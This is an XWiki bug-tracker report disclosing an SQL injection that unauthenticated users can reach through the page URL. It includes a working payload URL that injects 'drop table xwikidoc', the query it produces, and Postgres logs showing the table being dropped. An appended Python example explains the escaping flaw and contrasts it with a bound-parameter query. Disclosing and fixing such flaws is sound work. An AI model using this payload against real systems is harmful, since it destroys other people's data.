XWiki Platform / XWIKI-4754

SQL injection from URL by users who are not logged in.

Details

    • Bug
    • Resolution: Fixed
    • Critical
    • 2.1.2
    • 2.2
    • Storage
    • None
    • Postgres and Mysql
    • Easy

    Description

      SQL injection ruin bypasses XWiki and Hibernate security.
      Against multi-lingual wikis, can be used by an anonymous user.
      Also effective against single language wikis if the user is logged in.

      http://127.0.0.1:8081/xwikiTrunk/bin/view/Main\\' or ' = /; drop table xwikidoc; commit; --\
      

      Tested using PostgreSQL and MySQL.

      ' is converted to '' and query is generated:
      select doc.language from XWikiDocument as doc where doc.space = 'Main\\'' or '' = ' and doc.name = '; drop table xwikidoc; commit; --\' and (doc.language <> '' or (doc.language is not null and '' is null))
      Hibernate turns \\ into \ and "Main\\''" becomes "Main\''"

      Postgres log:
      WARNING: nonstandard use of \' in a string literal at character 100
      HINT: Use '' to write quotes in strings, or use the escape string syntax (E'...').
      LOG: execute <unnamed>: select xwikidocum0_.XWD_LANGUAGE as col_0_0_ from xwikidoc xwikidocum0_ where xwikidocum0_.XWD_WEB='Main\'' or '' = ' and xwikidocum0_.XWD_NAME='
      LOG: execute <unnamed>: drop table xwikidoc
      LOG: execute <unnamed>: commit
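
Added example (not XWiki's code and not part of the original report): a small Python model of how a string literal is scanned with and without backslash escapes, showing why doubling `'` alone fails for the space value in this report, next to the same lookup done with a bound parameter. The `doc` table, the function names and the use of SQLite for the bound query are assumptions made for illustration.

```python
import sqlite3

def literal_end(sql, start, backslash_escapes):
    """Index just past the quote that closes the literal opened at sql[start]."""
    i = start + 1
    while i < len(sql):
        if backslash_escapes and sql[i] == "\\":
            i += 2                      # backslash swallows the next character
        elif sql[i] == "'" and sql[i + 1:i + 2] == "'":
            i += 2                      # '' is an escaped quote in both modes
        elif sql[i] == "'":
            return i + 1                # closing quote
        else:
            i += 1
    return None                         # unterminated literal

def stays_in_literal(value, backslash_escapes):
    """True if quote doubling alone keeps `value` inside a single literal."""
    sql = "'" + value.replace("'", "''") + "'"
    return literal_end(sql, 0, backslash_escapes) == len(sql)

def lookup_bound(space):
    """The same lookup with a bound parameter; the value is never lexed as SQL."""
    db = sqlite3.connect(":memory:")
    db.execute("create table doc (space text, language text)")  # constructed stand-in
    db.execute("insert into doc values ('Main', 'en')")
    rows = db.execute("select language from doc where space = ?", (space,)).fetchall()
    remaining = db.execute("select count(*) from doc").fetchone()[0]
    db.close()
    return rows, remaining

# Constructed from the report: the space name after Hibernate has turned \\ into \
SPACE = "Main\\' or ' = "

if __name__ == "__main__":
    print("standard literals :", stays_in_literal(SPACE, False))
    print("backslash escapes :", stays_in_literal(SPACE, True))
    print("bound parameter   :", lookup_bound(SPACE))
```

With backslash escapes enabled the literal closes right after `Main\'`, which matches the `XWD_WEB='Main\''` fragment in the Postgres log above; the bound lookup returns no rows and leaves the table intact.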

            People

              calebjamesdelisle CalebJamesDeLisle